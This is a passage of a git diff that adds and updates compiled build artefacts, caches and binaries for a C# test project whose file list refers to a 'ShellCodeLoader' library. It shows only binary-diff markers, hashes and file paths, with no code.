index 0000000..6c05a97
Binary files /dev/null and b/Test/obj/Release/Test.Form1.resources differ
diff --git a/Test/obj/Release/Test.Properties.Resources.resources b/Test/obj/Release/Test.Properties.Resources.resources
new file mode 100644
index 0000000..6c05a97
Binary files /dev/null and b/Test/obj/Release/Test.Properties.Resources.resources differ
diff --git a/Test/obj/Release/Test.csproj.AssemblyReference.cache b/Test/obj/Release/Test.csproj.AssemblyReference.cache
new file mode 100644
index 0000000..f5e894a
Binary files /dev/null and b/Test/obj/Release/Test.csproj.AssemblyReference.cache differ
diff --git a/Test/obj/Release/Test.csproj.CopyComplete b/Test/obj/Release/Test.csproj.CopyComplete
new file mode 100644
index 0000000..e69de29
diff --git a/Test/obj/Release/Test.csproj.CoreCompileInputs.cache b/Test/obj/Release/Test.csproj.CoreCompileInputs.cache
new file mode 100644
index 0000000..058c7f4
--- /dev/null
+++ b/Test/obj/Release/Test.csproj.CoreCompileInputs.cache
@@ -0,0 +1 @@
+cc3bca52f731fc5b76c24ac730a2561f6c360edc
diff --git a/Test/obj/Release/Test.csproj.FileListAbsolute.txt b/Test/obj/Release/Test.csproj.FileListAbsolute.txt
new file mode 100644
index 0000000..fc99eaf
--- /dev/null
+++ b/Test/obj/Release/Test.csproj.FileListAbsolute.txt
@@ -0,0 +1,13 @@
+F:\Personal\ShellCodeLoader\Test\bin\Release\Test.exe.config
+F:\Personal\ShellCodeLoader\Test\bin\Release\Test.exe
+F:\Personal\ShellCodeLoader\Test\bin\Release\Test.pdb
+F:\Personal\ShellCodeLoader\Test\bin\Release\ShellCodeLoader.dll
+F:\Personal\ShellCodeLoader\Test\bin\Release\ShellCodeLoader.pdb
+F:\Personal\ShellCodeLoader\Test\obj\Release\Test.csproj.AssemblyReference.cache
+F:\Personal\ShellCodeLoader\Test\obj\Release\Test.Form1.resources
+F:\Personal\ShellCodeLoader\Test\obj\Release\Test.Properties.Resources.resources
+F:\Personal\ShellCodeLoader\Test\obj\Release\Test.csproj.GenerateResource.cache
+F:\Personal\ShellCodeLoader\Test\obj\Release\Test.csproj.CoreCompileInputs.cache
+F:\Personal\ShellCodeLoader\Test\obj\Release\Test.csproj.CopyComplete
+F:\Personal\ShellCodeLoader\Test\obj\Release\Test.exe
+F:\Personal\ShellCodeLoader\Test\obj\Release\Test.pdb
diff --git a/Test/obj/Release/Test.csproj.GenerateResource.cache b/Test/obj/Release/Test.csproj.GenerateResource.cache
new file mode 100644
index 0000000..976c1bd
Binary files /dev/null and b/Test/obj/Release/Test.csproj.GenerateResource.cache differ
diff --git a/Test/obj/Release/Test.exe b/Test/obj/Release/Test.exe
new file mode 100644
index 0000000..ef7cd64
Binary files /dev/null and b/Test/obj/Release/Test.exe differ
diff --git a/Test/obj/Release/Test.pdb b/Test/obj/Release/Test.pdb
new file mode 100644
index 0000000..1ebdc16
Binary files /dev/null and b/Test/obj/Release/Test.pdb differ
diff --git a/Test/obj/x64/Debug/Test.csproj.AssemblyReference.cache b/Test/obj/x64/Debug/Test.csproj.AssemblyReference.cache
index 79e1112..775dd3a 100644
Binary files a/Test/obj/x64/Debug/Test.csproj.AssemblyReference.cache and b/Test/obj/x64/Debug/Test.csproj.AssemblyReference.cache differ
diff --git a/Test/obj/x64/Debug/Test.csproj.CoreCompileInputs.cache b/Test/obj/x64/Debug/Test.csproj.CoreCompileInputs.cache
index 9b23b08..855dbe7 100644
--- a/Test/obj/x64/Debug/Test.csproj.CoreCompileInputs.cache
+++ b/Test/obj/x64/Debug/Test.csproj.CoreCompileInputs.cache
@@ -1 +1 @@
-e611841c91334bbfdd54b06c6f65ffef0d5bc2a6
+69ed1963c678b7433cfcad1463c463db4cb3db12
diff --git a/Test/obj/x64/Debug/Test.csproj.GenerateResource.cache b/Test/obj/x64/Debug/Test.csproj.GenerateResource.cache
index ee0944a..f2904a4 100644
Binary files a/Test/obj/x64/Debug/Test.csproj.GenerateResource.cache and b/Test/obj/x64/Debug/Test.csproj.GenerateResource.cache differ
diff --git a/Test/obj/x64/Debug/Test.exe b/Test/obj/x64/Debug/Test.exe
index 80486ac..4347f89 100644
Binary files a/Test/obj/x64/Debug/Test.exe and b/Test/obj/x64/Debug/Test.exe differ
diff --git a/Test/obj/x64/Debug/Test.pdb b/Test/obj/x64/Debug/Test.pdb
index 3ccfd75..4fd0d42 100644
Binary files a/Test/obj/x64/Debug/Test.pdb and b/Test/obj/x64/Debug/Test.pdb differ